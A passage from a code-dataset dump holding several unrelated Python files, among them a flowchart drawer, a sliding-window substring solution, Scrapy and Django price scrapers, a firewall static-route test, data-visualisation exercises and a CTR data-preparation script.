BLOCK_WIDTH, calc_y(node.back_link.y) + BLOCK_HEIGHT // 2, arrow=\"last\")\n canvas.tag_lower(l1)\n canvas.tag_lower(l2)\n canvas.tag_lower(l3)\n\n if node.children[1] is not None:\n child = node.children[0]\n l1 = canvas.create_line(cur_x, cur_y + BLOCK_HEIGHT // 2, calc_x(child.x) + BLOCK_WIDTH // 2,\n cur_y + BLOCK_HEIGHT // 2)\n canvas.tag_lower(l1)\n l2 = canvas.create_line(calc_x(child.x) + BLOCK_WIDTH // 2, cur_y + BLOCK_HEIGHT // 2, calc_x(child.x) +\n BLOCK_WIDTH // 2, calc_y(child.y))\n canvas.tag_lower(l2)\n draw_node(canvas, child, func, dialog_factory)\n\n child = node.children[1]\n l1 = canvas.create_line(cur_x, cur_y + BLOCK_HEIGHT // 2, calc_x(child.x) + BLOCK_WIDTH // 2,\n cur_y + BLOCK_HEIGHT // 2)\n canvas.tag_lower(l1)\n l2 = canvas.create_line(calc_x(child.x) + BLOCK_WIDTH // 2, cur_y + BLOCK_HEIGHT // 2, calc_x(child.x) +\n BLOCK_WIDTH // 2, calc_y(child.y))\n canvas.tag_lower(l2)\n\n canvas.create_text([cur_x - BLOCK_WIDTH // 2, cur_y + BLOCK_STEP / 2.5], justify=\"center\", text=\"Да\")\n canvas.create_text([cur_x + BLOCK_WIDTH * 1.5, cur_y + BLOCK_STEP / 2.5], justify=\"center\", text=\"Нет\")\n draw_node(canvas, child, func, dialog_factory)\n elif node.children[0] is not None:\n child = node.children[0]\n arrow = \"\" if child.type in {\"loop_end\", \"if_end\"} else \"last\"\n if child.x == node.x:\n l = canvas.create_line(cur_x + BLOCK_WIDTH // 2, cur_y, calc_x(child.x) + BLOCK_WIDTH // 2,\n calc_y(child.y), arrow=arrow)\n canvas.tag_lower(l)\n else:\n l1 = canvas.create_line(cur_x + BLOCK_WIDTH // 2, cur_y, cur_x + BLOCK_WIDTH // 2,\n calc_y(child.y))\n canvas.tag_lower(l1)\n l2 = canvas.create_line(cur_x + BLOCK_WIDTH // 2, calc_y(child.y), calc_x(child.x) +\n BLOCK_WIDTH // 2, calc_y(child.y), arrow=arrow)\n canvas.tag_lower(l2)\n\n draw_node(canvas, child, func, dialog_factory)\n\n\ndef get_node_text(node):\n if node.type == \"if\":\n return node.text if node.value is None else \"Если {}, тогда\".format(node.value)\n elif node.type == \"while_loop\":\n return node.text if node.value is None else \"Пока {}, тогда\".format(node.value)\n elif node.type == \"for_loop\":\n return node.text if node.value is None else \"Для {} от {} до {}\".format(node.value[0],\n node.value[1],\n node.value[2])\n elif node.type == \"input\":\n return node.text if node.value is None else \"Ввод {}\".format(node.value)\n elif node.type == \"output\":\n return node.text if node.value is None else \"Вывод {}\".format(node.value)\n elif node.type == \"assign\":\n return node.text if node.value is None else node.value\n elif node.type == \"var\":\n return node.text if node.value is None else \"var \" + \",\".join([val for val in node.value.values() if val])\n elif node.type == \"call_function\":\n return \"Вызов функции \" + node.value[2]\n else:\n return node.text\n\n","sub_path":"drawer.py","file_name":"drawer.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"97501069","text":"\"\"\"\nGiven a string and a set of characters, return the shortest substring containing all the characters in the set.\n\nFor example, given the string \"figehaeci\" and the set of characters {a, e, i}, you should return \"aeci\".\n\nIf there is no substring containing all the characters in the set, return null.\n\nSolution:\nRunning window variation,\nUse a hashmap to keep counts\nUse a start index & end index to keep positions\nO(n) time & space\n\"\"\"\n\n\ndef find_shortest_substring(string, char_set):\n 
counts = dict()\n start = 0\n end = 0\n curr = None\n chars_found = set()\n\n while end < len(string) and start < len(string):\n while len(chars_found) < len(char_set) and end < len(string):\n end_char = string[end]\n if end_char not in counts:\n counts[end_char] = 0\n counts[end_char] += 1\n\n if end_char in char_set and counts[end_char] == 1:\n chars_found.add(end_char)\n\n if len(chars_found) == len(char_set):\n if not curr:\n curr = (start, end)\n if curr[1] - curr[0] > end - start:\n curr = (start, end)\n end += 1\n\n while len(chars_found) >= len(char_set) and start < len(string):\n # snip until window cannot fulfil char_set\n start_char = string[start]\n counts[start_char] -= 1\n if counts[start_char] == 0:\n counts.pop(start_char)\n if start_char in char_set:\n chars_found.remove(start_char)\n start += 1\n\n if curr:\n return string[curr[0] : curr[1] + 1]\n else:\n return None\n\n\n# while there's r\n# move r, increment matches\n# if matches is full and l <= r:\n# update result\n# delete l\n# update matches\n# increment l\n# increment r\n# return result\ndef shorter_solution(string, char_set):\n matches = 0\n start = 0\n end = 0\n counts = {}\n result = None\n\n while end < len(string):\n char = string[end]\n counts[char] = counts.get(char, 0) + 1\n if counts[char] == 1 and char in char_set:\n matches += 1\n\n while matches == len(char_set) and start <= end:\n if not result:\n result = (start, end)\n\n if end - start < result[1] - result[0]:\n result = (start, end)\n\n char = string[start]\n counts[char] -= 1\n if char in char_set and counts[char] == 0:\n matches -= 1\n\n start += 1\n\n end += 1\n if result:\n return string[result[0] : result[1] + 1]\n else:\n return None\n\n\nif __name__ == \"__main__\":\n\n in1 = (\"figehaeci\", {\"a\", \"e\", \"i\"})\n expected1 = \"aeci\"\n\n assert shorter_solution(in1[0], in1[1]) == expected1\n","sub_path":"old/dcp_series/dcp_103.py","file_name":"dcp_103.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"361343597","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom sun0769.items import Sun0769Item\n\nclass YgSpider(scrapy.Spider):\n name = 'yg'\n allowed_domains = ['sun0769.com']\n start_urls = ['http://wz.sun0769.com/html/top/reply.shtml']\n\n def parse(self, response):\n tr_list=response.xpath(\"//div[contains(@class,'clearfix')]/table[2]//tr\")\n for tr in tr_list:\n item=Sun0769Item()\n item['title']=tr.xpath('./td[3]/a/@title').get()\n item['page_info']=tr.xpath('./td[@class=\"txt18\"]/a/@href').get()\n item['date']=tr.xpath('./td[6]/text()').get()\n # print(item)\n yield scrapy.Request(url=item['page_info'],callback=self.page_parser,meta={'item':item})\n\n next_page=response.xpath(\"//a[text()='>']/@href\").get()\n if next_page:\n yield scrapy.Request(url=next_page,callback=self.parse)\n\n def page_parser(self,response):\n item=response.meta['item']\n item['content']=response.xpath(\"string(//td[@class='txt16_3'])\").get()\n item['img'] = response.xpath(\"//div[@class='textpic']//img/@src\").get()\n if item['img']:\n item['img']= 'http://wz.sun0769.com/'+item['img']\n yield item\n","sub_path":"scrapy 框架/sun0769/sun0769/spiders/yg.py","file_name":"yg.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"618523124","text":"import matplotlib.pyplot as plt\nfrom numpy import loadtxt\nfrom sklearn.decomposition import PCA\n\n# Load the dataset\nX = 
X = loadtxt('hw3_pen_data.txt', delimiter=',', usecols=range(0, 16))\nY = loadtxt('hw3_pen_data.txt', delimiter=',', usecols=16)\n\npca = PCA(n_components=2)\nX_r = pca.fit_transform(X)\n\n# Percentage of variance explained for each component\nprint('explained variance ratio (first two components): %s'\n      % str(pca.explained_variance_ratio_))\n#\nplt.figure()\n\n# plt.scatter(X_r[:, 0], X_r[:, 1], 10, Y, label=Y)\nfor i in range(0, 10):\n    plt.scatter(X_r[Y == i, 0], X_r[Y == i, 1], label=i, alpha=.8, lw=1)\nplt.legend(loc='best', shadow=False, scatterpoints=1)\nplt.title('PCA of the Pen Digits dataset')\n\nplt.show()\n","sub_path":"hw3/DimemsionReduction.py","file_name":"DimemsionReduction.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"513012865","text":"# Summary practice for data visualization\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nhouse = pd.read_csv(\"./house_data.csv\")\nprint(house)\n\n# Scatter plot: x axis = price converted to Japanese yen (1 USD = 100 JPY), y axis = living area\nhouse[\"price_jp\"] = house[\"price\"]*100 # convert to Japanese yen\nplt.scatter(x=house[\"price_jp\"],y=house[\"sqft_living\"],s=1,color=\"green\") # s is the marker size\nplt.xlabel(\"price\")\nplt.ylabel(\"sqft_living\")\nplt.show()\n\n# Add a new column for the house condition: condition 1-2 is bad, 3-5 is good.\nhouse[\"good/bad\"] = 0 # create the good/bad column\nhouse.loc[house[\"condition\"]<=2,\"good/bad\"] = \"bad\" # rows whose condition is 2 or less get \"bad\"\nhouse.loc[house[\"condition\"]>=3,\"good/bad\"] = \"good\" # rows whose condition is 3 or more get \"good\"\nprint(\"Value counts of the condition column\")\nprint(house[\"condition\"].value_counts()) # check the value counts of the condition column\nprint(\"Value counts of the good/bad column\")\nprint(house[\"good/bad\"].value_counts()) # check the value counts of the good/bad column\n\n# Box plot: x axis = house grade (4 and 5 only), y axis = price in JPY, hue split by good/bad\ndata = house[(house[\"grade\"]>3) & (house[\"grade\"]<6)] # keep only the rows matching the condition\nx = data[\"grade\"] # extract the grade column\ny = data[\"price_jp\"] # extract the price_jp column\nsns.boxplot(x,y,hue=data[\"good/bad\"]) # hue must come from the same filtered frame as x and y\nplt.show()\n","sub_path":"sample20.py","file_name":"sample20.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"27077685","text":"from couchbase.bucket import Bucket\nfrom couchbase.n1ql import N1QLQuery, N1QLRequest\n\nfrom app.core.config import COUCHBASE_BUCKET_NAME\n\nfrom typing import Sequence, Union\nfrom enum import Enum\n\n\ndef ensure_enums_to_strs(items: Sequence[Union[Enum, str]]):\n    str_items = []\n    for item in items:\n        if isinstance(item, Enum):\n            str_items.append(str(item.value))\n        else:\n            str_items.append(str(item))\n    return str_items\n\n\n
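# illustrative example: for a hypothetical enum member Color.RED with value 'red',\n# ensure_enums_to_strs(['a', Color.RED]) returns ['a', 'red']\n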
def get_all_documents_by_type(bucket: Bucket, *, doc_type: str, skip=0, limit=100):\n    query_str = f\"SELECT *, META().id as id FROM {COUCHBASE_BUCKET_NAME} WHERE type = $type LIMIT $limit OFFSET $skip;\"\n    q = N1QLQuery(\n        query_str, bucket=COUCHBASE_BUCKET_NAME, type=doc_type, limit=limit, skip=skip\n    )\n    result = bucket.n1ql_query(q)  # type: N1QLRequest\n    return result\n","sub_path":"{{cookiecutter.project_slug}}/backend/app/app/crud/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"638632623","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nPROBLEM\n\nYou have a callable that you would like to use with some other Python code,\npossibly as a callback function or handler, but it takes too many arguments and\ncauses an exception when called.\n\"\"\"\n\n\n\"\"\"\nSOLUTION\n\"\"\"\n\nimport logging\nimport math\nfrom multiprocessing import Pool\nfrom functools import partial\nfrom socketserver import StreamRequestHandler\nfrom socketserver import TCPServer\n\n\ndef spam(a, b, c, d):\n    print(a, b, c, d)\n\n\n\"\"\"\nDISCUSSION\n\"\"\"\n\ndef distance(p1, p2):\n    x1, y1 = p1\n    x2, y2 = p2\n    return math.hypot(x2 - x1, y2 - y1)\n\ndef output_result(result, log=None):\n    if log is not None:\n        log.debug('Got: %r', result)\n\n# A sample function\ndef add(x, y):\n    return x + y\n\n\nclass EchoHandler(StreamRequestHandler):\n    # ack is an added keyword-only argument. *args, **kwargs are\n    # any normal parameters supplied (which are passed on)\n    def __init__(self, *args, ack, **kwargs):\n        self.ack = ack\n        super().__init__(*args, **kwargs)\n\n    def handle(self):\n        for line in self.rfile:\n            self.wfile.write(b'GOT:' + line)\n\n\nif __name__ == '__main__':\n\n    s1 = partial(spam, 1) # a = 1\n    s1(2, 3, 4)  # spam prints its arguments, so no outer print is needed\n    s1(4, 5, 6)\n    print('')\n\n
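    # added note: a partial object exposes its frozen state, e.g.\n    # s1.func is spam, s1.args == (1,), s1.keywords == {}\n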
    s2 = partial(spam, d=42) # d = 42\n    s2(1, 2, 3)\n    s2(4, 5, 5)\n    print('')\n\n    s3 = partial(spam, 1, 2, d=42) # a = 1, b = 2, d = 42\n    s3(3)\n    s3(4)\n    s3(5)\n    print('')\n\n    points = [ (1, 2), (3, 4), (5, 6), (7, 8) ]\n\n    pt = (4, 3)\n    points.sort(key=partial(distance, pt))\n    points.sort(key=lambda p: distance(pt, p))  # equivalent lambda form\n    print(points)\n    print('')\n\n    logging.basicConfig(level=logging.DEBUG)\n    log = logging.getLogger('test')\n\n    p = Pool()\n    p.apply_async(add, (3, 4), callback=partial(output_result, log=log))\n    p.apply_async(add, (3, 4), callback=lambda result: output_result(result, log))\n    p.close()\n    p.join()\n\n    serv = TCPServer(('', 15000), partial(EchoHandler, ack=b'RECEIVED:'))\n    serv = TCPServer(('', 15001),  # equivalent lambda form\n                     lambda *args, **kwargs: EchoHandler(*args,\n                                                         ack=b'RECEIVED:',\n                                                         **kwargs))\n    serv.serve_forever()\n","sub_path":"ch7/7.8/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"371712224","text":"import pytest\r\nimport time\r\nimport sys\r\nfrom page_obj.common.rail import *\r\nfrom os.path import dirname, abspath\r\nfrom page_obj.common.ssh import *\r\nfrom page_obj.scg.scg_def_static_route import *\r\nfrom page_obj.scg.scg_def import *\r\nfrom page_obj.scg.scg_def_ifname_OEM import *\r\nfrom page_obj.scg.scg_dev import *\r\n\r\nsys.path.insert(0, dirname(dirname(abspath(__file__))))\r\n\r\ntest_id = \"140961\"\r\n# Add 10 static route entries, click the delete button, and delete the fifth one\r\n\r\n\r\ndef test_c140961(browser):\r\n\r\n    try:\r\n\r\n        login_web(browser, url=dev1)\r\n\r\n        for n in range(1, 11):\r\n\r\n            add_static_route_single_wxw(browser, ip='20.1.'+str(n)+'.0', mask='24', out_device=interface_name_2,\r\n                                        gateway='12.1.1.2', enable='yes')\r\n\r\n        del_ipv4_static_route_bydestination(browser, destination='20.1.6.0/255.255.255.0')\r\n        exist = is_static_route_exist_wxw(browser, destination='20.1.6.0/255.255.255.0')\r\n        loginfo = get_log_info(browser, 管理日志)\r\n        # print(loginfo)\r\n\r\n        for m in range(1, 6):\r\n            del_ipv4_static_route_bydestination(browser, destination='20.1.' + str(m) + '.0/255.255.255.0')\r\n        for m in range(7, 11):\r\n            del_ipv4_static_route_bydestination(browser, destination='20.1.' + str(m) + '.0/255.255.255.0')\r\n\r\n        try:\r\n            assert \"删除静态路由对象成功\" in loginfo\r\n            assert exist is False\r\n            rail_pass(test_run_id, test_id)\r\n        except:\r\n            # report the failure, then re-run the asserts so pytest records the error\r\n            rail_fail(test_run_id, test_id)\r\n            assert \"删除静态路由对象成功\" in loginfo\r\n            assert exist is False\r\n\r\n    except Exception as err:\r\n        # If any step above raised an error, reset the device and restore its configuration\r\n        print(err)\r\n        rail_fail(test_run_id, test_id)\r\n        reload(hostip=dev1)\r\n        assert False\r\n\r\n\r\nif __name__ == '__main__':\r\n    pytest.main([\"-v\", \"-s\", \"test_c\" + str(test_id) + \".py\"])","sub_path":"pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_Route/test_c140961.py","file_name":"test_c140961.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"295160015","text":"from django.shortcuts import render, render_to_response\nimport csv,sys,os\nfrom .models import Item_Model, Brand_Model, Raw_Entity, Req_Entity\nfrom .form import Form1, Form2, Form3\nfrom formtools.wizard.views import SessionWizardView, TemplateView\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport urllib.request  # convert_val below uses urllib.request.urlopen\nfrom xml.etree import ElementTree as ET\nfrom django.http import HttpResponse\n\nFILENAME = \"tsum_data.csv\"\nart_list = []\n# from django.core.mail import send_mail\n\n\n# class ContactWizard(SessionWizardView):\n#     template_name = \"tsum_app/contact_form.html\"\n\n#     def done(self, form_list, **kwargs):\n#         form_data = process_form_data(form_list)\n#         return render_to_response('tsum_app/done.html', {\n#             'form_data': form_data})\n\nFORMS = [\n    (\"brand_form\", Form1),\n    (\"list_form\", Form2),\n    (\"sites_form\", Form3),\n\n]\n\nTEMPLATES = {\n    \"brand_form\" : \"tsum_app/brand.html\",\n    \"list_form\" : \"tsum_app/list.html\",\n    \"sites_form\" : \"tsum_app/sites_list.html\",\n\n}\n\ndef parser(request):\n    items = Raw_Entity.objects.all()\n    for i in items:\n\n\n        gig_price = giglio_search(i.atr) \n        sl_price = sl_search(i.atr)\n        price = get_price(i.url)\n\n        tsum_data = {'brand': i.brand,\n                     'name': i.name,\n                     'id': i.atr,\n                     'url': i.url,\n                     'price': price,\n                     'giglio price': gig_price,\n                     'sl price': sl_price\n                     } \n        data = write_csv(tsum_data, request)\n\n    return HttpResponse (data, content_type='text/csv')\n\nclass ResultView(TemplateView):\n    template_name = \"tsum_app/done.html\"\n\n    def get_context_data(self, **kwargs):\n        context = super(ResultView, self).get_context_data(**kwargs)\n        context.update({\n            'row_entity' : Raw_Entity.objects.all()\n        })\n        return context\n\n\n\n\ndef get_html(url):\n    r=requests.get(url)\n    # print(r) \n    return r.text\n\ndef get_price(url):\n    html = get_html(url)\n    soup = BeautifulSoup(html, 'lxml')\n\n    try:\n        box = soup.find('div', class_ = 'item__price-wrapper price__wrap js-price-wrap')\n\n        try:\n\n            price = box.find('div', class_ = 'price price_type_new js-price js-price-best').text.strip()\n        except:\n\n            try:\n                price = box.find('div', class_ = 'price price_type_old js-price js-price-old').text.strip()\n            except:\n\n                price = box.find('div', class_ = 'price price_type_retail js-price js-price-old').text.strip()\n\n    except:\n        price = '' \n\n    # strip spaces and the trailing rouble sign; str.replace returns a new string\n    if price and price[-1] == '₽':\n        price = price.replace(' ', '').replace('₽', '')\n\n    return price\n\n\n# def csv_d(data, request):\n#     data = write_csv(ModelAdmin, request, Model.objects.all())\n\n#     return HttpResponse (data, content_type='text/csv')\n\n\n
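# illustrative: write_csv below expects the dict shape built in parser() above;\n# the values in this sketch are hypothetical:\n#   {'brand': 'X', 'name': 'Y', 'id': '1', 'url': '...', 'price': '100',\n#    'giglio price': '90', 'sl price': '95'}\n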
filename=\"somefilename.csv\"'\n with open(FILENAME, 'a', encoding='utf-8', newline='') as f:\n #column = [\"brand\",\"\",:]\n writer = csv.writer(response,f, delimiter=';')\n writer.writerow( (data['brand'],\n data['name'],\n data['id'],\n data['url'],\n data['price'],\n data['giglio price'],\n data['sl price']\n \n ))\n return response \n\n\n\n\nclass ContactWizard(SessionWizardView):\n\n def get_template_names(self):\n return [TEMPLATES[self.steps.current]]\n\n def get_context_data(self, form, **kwargs):\n context = super(ContactWizard, self).get_context_data(form=form, **kwargs)\n if self.steps.current == 'list_form':\n context.update({'ok': 'True'})\n return context\n\n def done(self, form_list, **kwargs):\n\n\n # with open(\"tsum_app/static/csv/tsum_data.csv\", 'r', encoding='utf-8') as f:\n # reader = csv.reader(f, delimiter=';')\n # for row in reader:\n # if row[0] != 'Brand':\n # ent= Raw_Entity()\n # ent.brand = row[0]\n # ent.name = row[1]\n # ent.atr = row[2]\n # ent.url = row[3]\n # ent.save()\n\n\n items = Item_Model.objects.all()\n for i in items:\n i.delete()\n\n\n form_data = process_form_data(form_list)\n addBrandForm = form_data[0]\n addListForm = form_data[1]\n addSitesForm = form_data[2]\n\n try:\n\n site1 = addSitesForm['multiple_checkboxes'][0]\n except:\n site1 = ''\n try:\n\n site2 = addSitesForm['multiple_checkboxes'][1]\n\n except:\n site2 = '' \n\n l = Req_Entity.objects.create(\n brand = addBrandForm['brand'],\n atr_1 = addListForm['atr_1'],\n atr_2 = addListForm['atr_2'],\n atr_3 = addListForm['atr_3'],\n site_1 = site1,site_2 = site2)\n print ('almost000000000000000000')\n fill_items(l)\n items = Item_Model.objects.all()\n return render_to_response('tsum_app/done.html', {\n 'items': items})\n\n\ndef fill_items(some_object):\n print ('i am here!!!!')\n items = Raw_Entity.objects.all()\n sl_price = ''\n gig_price = ''\n for i in items:\n if (i.atr == some_object.atr_1) or (i.atr == some_object.atr_2) or (i.atr == some_object.atr_3):\n\n if (some_object.site_1 != ''):\n sl_price = sl_search(i.atr)\n if (some_object.site_2 != ''):\n gig_price = giglio_search(i.atr) \n \n price = get_price(i.url)\n print ('i am here')\n\n\n l = Item_Model.objects.create(\n brand = i.brand,\n atr = i.atr,\n url = i.url,\n price = price,\n price_shop1 = sl_price,\n price_shop2 = gig_price\n )\n # items_q.put(l) \n\n # return items_q\n \n\n\ndef start_page(request):\n # items = Item_Model.objects.all()\n # for i in items:\n # art_list.append(i.atr)\n # # ItemJson = json.dumps({'art': art_list})\n # # print (ItemJson)\n # with open('tsum_app/static/js/json_items.js', 'w') as outfile:\n # json.dump({'art': art_list}, outfile)\n return render(request, 'tsum_app/base.html')\n\ndef item_list(request):\n item = Entity.objects.all()\n return render(request, 'tsum_app/item_list.html', {'item': item})\n\ndef item_new(request):\n form = EntityForm()\n return render(request, 'tsum_app/second_frame.html', {'form': form})\n\n\n\ndef process_form_data(form_list):\n form_data = [form.cleaned_data for form in form_list]\n return form_data\n\n\n# def autocomplete_city(request):\n# term = request.GET.get('term') #jquery-ui.autocomplete parameter\n# item = Entity.objects.filter(name__istartswith=term) #lookup for a city\n# res = []\n# for ш in item:\n# #make dict with the metadatas that jquery-ui.autocomple needs (the documentation is your friend)\n# dict = {'id':c.id, 'label':c.__unicode__(), 'value':c.__unicode__()}\n# res.append(dict)\n# return 
HttpResponse(simplejson.dumps(res))\n\n\n\n\n\n\n\n\ndef giglio_search(ar):\n art = str(ar)\n art = art.replace('/','+')\n art = art.replace(' ','+')\n giglio_url = 'https://www.giglio.com/rus/search-results/?k='\n r = requests.get(giglio_url+art) \n gig_price = giglio_catalog_content(r.text)\n return gig_price\n\ndef giglio_catalog_content(html):\n soup = BeautifulSoup(html, 'lxml')\n ads = soup.find_all('article', class_ = 'boxArt')\n gig_price = 'товар не найден'\n for ad in ads:\n first = 4\n price = ad.find('small', class_ = 'priceBox') \n try:\n del_part = price.find('del').text + price.find('q').text\n first = len(del_part)+5\n except: del_part = 0\n gig_price = price.text[first:len(price.text)]\n return gig_price \n\n\n\ndef sl_search(ar):\n art = str(ar)\n art = art.replace('/','+')\n art = art.replace(' ','+')\n # print(art)\n sl_url = 'http://www.ysl.com/Search/Index?textsearch='+art+'&siteCode=SAINTLAURENT_US&season=A%2CP%2CE&department=llmnwmn&gender='\n #sl_url = 'http://www.fwrd.com/fw/Category.jsp?search='+art\n r = requests.get(sl_url) \n sl_price = sl_catalog_content(r.text)\n\n return sl_price\n\ndef sl_catalog_content(html):\n soup = BeautifulSoup(html, 'lxml')\n # print('sl_catalog_content')\n try:\n sl_price = soup.find('div', class_ = 'infoPrice').find('span',class_ = 'value').get('data-ytos-price') \n except: \n sl_price = 'товар не найден'\n if sl_price != 'товар не найден': \n sl_price = convert_val(sl_price)\n sl_price = round(sl_price, 2)\n # print(sl_price)\n \n return sl_price\n\ndef convert_val(summa):\n convert_valuta = 0\n valueUSD = 1\n root = ET.parse(urllib.request.urlopen('http://www.cbr.ru/scripts/XML_daily.asp')).getroot()\n for x in root:\n if x.attrib['ID'] == 'R01235': valueUSD = x.find('Value').text.replace(',', '.')\n convert_valuta = float(valueUSD) * float(summa)\n\n return convert_valuta\n\n","sub_path":"tsum_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"489456262","text":"from CTR_utils import *\n\nDATA = pickle.load(open('../Datasets/DATASET_CTR_BASE.pkl'))\n\n# get data \n\nkeys_id = DATA.data.keys()\n\nvars = ['num_img', 'num_hab', 'num_ban','dim_prop','dim_total','est',\\\n 'num_zones','info_score','precio_usd','id_tipo','id_mod','id_old',\\\n 'lat','lon']\n \n\np_casa_venta = [DATA.data[k].data['precio_usd'] for k in keys_id if DATA.data[k].data['id_tipo'] == 1 and DATA.data[k].data['id_mod'] == 1]\np_casa_arrie = [DATA.data[k].data['precio_usd'] for k in keys_id if DATA.data[k].data['id_tipo'] == 1 and DATA.data[k].data['id_mod'] == 2]\np_dpto_venta = [DATA.data[k].data['precio_usd'] for k in keys_id if DATA.data[k].data['id_tipo'] == 2 and DATA.data[k].data['id_mod'] == 1]\np_dpto_arrie = [DATA.data[k].data['precio_usd'] for k in keys_id if DATA.data[k].data['id_tipo'] == 2 and DATA.data[k].data['id_mod'] == 2]\n\nm_casa_venta = sum(p_casa_venta)/len(p_casa_venta)\nm_casa_arrie = sum(p_casa_arrie)/len(p_casa_arrie)\nm_dpto_venta = sum(p_dpto_venta)/len(p_dpto_venta)\nm_dpto_arrie = sum(p_dpto_arrie)/len(p_dpto_arrie)\n\nDATA_X = np.zeros((len(keys_id),len(vars)),np.float)\n\nDATA_ctr_map = np.zeros(len(keys_id))\nDATA_ctr_list = np.zeros(len(keys_id))\nDATA_ctr_land = np.zeros(len(keys_id))\nDATA_ctr = np.zeros(len(keys_id))\n\n# fill train matrix\nfor i,k in enumerate(keys_id):\n data = DATA.data[k].data\n DATA_X[i,:] = [data[var] for var in vars]\n\nprint(\"Training matrix created. 
Now fixing missing data...\")\n\n# fill missing data\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['num_img'] == False]\nfor k in k_miss:\n DATA_X[k[1],0] = 0\n\nprint(\"Fixed num_img\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['num_hab'] == False]\nfor k in k_miss:\n DATA_X[k[1],1] = 1\n\nprint(\"Fixed num_hab\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['num_ban'] == False]\nfor k in k_miss:\n DATA_X[k[1],2] = 0\n\nprint(\"Fixed num_ban\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['dim_prop'] == False]\nfor k in k_miss:\n DATA_X[k[1],3] = 60.0\n \nprint(\"Fixed dim_prop\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['dim_total'] == False or DATA.data[k].data['dim_total'] < DATA.data[k].data['dim_prop']]\nfor k in k_miss:\n DATA_X[k[1],4] = DATA_X[k[1],3]\n\nprint (\"Fixed dim_total\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['est'] == False]\nfor k in k_miss:\n if DATA.data[k[0]].data['id_tipo'] == 1:\n DATA_X[k[1],5] = 1\n else:\n DATA_X[k[1],5] = 0\n\nprint(\"Fixed est\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['num_zones'] == False]\nfor k in k_miss:\n DATA_X[k[1],6] = 0\n\nprint(\"Fixed num_zones\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['info_score'] == False]\nfor k in k_miss:\n DATA_X[k[1],7] = 200.0\n\nprint(\"Fixed info_score\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['precio_usd'] == False]\nfor k in k_miss:\n if DATA.data[k[0]].data['id_tipo'] == 1:\n if DATA.data[k[0]].data['id_mod'] == 1:\n DATA_X[k[1],8] = m_casa_venta\n else:\n DATA_X[k[1],8] = m_casa_arrie\n else:\n if DATA.data[k[0]].data['id_mod'] == 1:\n DATA_X[k[1],8] = m_dpto_venta\n else:\n DATA_X[k[1],8] = m_dpto_arrie\n\nprint(\"Fixed precio_usd\")\n\nprint(\"Missing data fixed. 
Now getting CTR values...\")\n# now fill CTR values\nfor i,k in zip(range(len(keys_id)),keys_id):\n    data = DATA.data[k].data\n    if data['map_impr']:\n        DATA_ctr_map[i] = float(data['map_visit'])/data['map_impr']\n    if data['list_impr']:\n        DATA_ctr_list[i] = float(data['list_visit'])/data['list_impr']\n    if data['land_impr']:\n        DATA_ctr_land[i] = float(data['land_visit'])/data['land_impr']\n    if data['map_impr'] + data['list_impr'] + data['land_impr']:\n        DATA_ctr[i] = float(data['map_visit'] + data['list_visit']+data['land_visit'])/ \\\n                      (data['map_impr'] + data['list_impr']+data['land_impr'])\n\nprint(\"CTR computed\")\n\n\n\nmap_impr = np.array([float(item.data['map_impr']) for item in DATA.data.values() ]) \nmap_visit = np.array([float(item.data['map_visit']) for item in DATA.data.values() ])\nlist_impr = np.array([float(item.data['list_impr']) for item in DATA.data.values() ]) \nlist_visit = np.array([float(item.data['list_visit']) for item in DATA.data.values() ])\n\nvec_tipo = np.array([float(item.data['id_tipo']) for item in DATA.data.values() ])\nvec_mod = np.array([float(item.data['id_mod']) for item in DATA.data.values() ])\nvec_precios = np.array([float(item.data['precio_usd']) for item in DATA.data.values() ])\n\nlat = np.array([float(item.data['lat']) for item in DATA.data.values() ])\nlon = np.array([float(item.data['lon']) for item in DATA.data.values() ])\n\ndias = []\nfor item in DATA.data.values():\n    if item.dataexist['deleted_at']:\n        ndias = (time.mktime(time.strptime(item.data['deleted_at'][:10],'%Y-%m-%d'))-time.mktime(time.strptime(item.data['created_at'][:10],'%Y-%m-%d')))/3600/24\n    else:\n        ndias = (time.time()-time.mktime(time.strptime(item.data['created_at'][:10],'%Y-%m-%d')))/3600/24\n    dias.append(ndias)\ndias = np.array(dias)\n\n'''\ndm = [i for 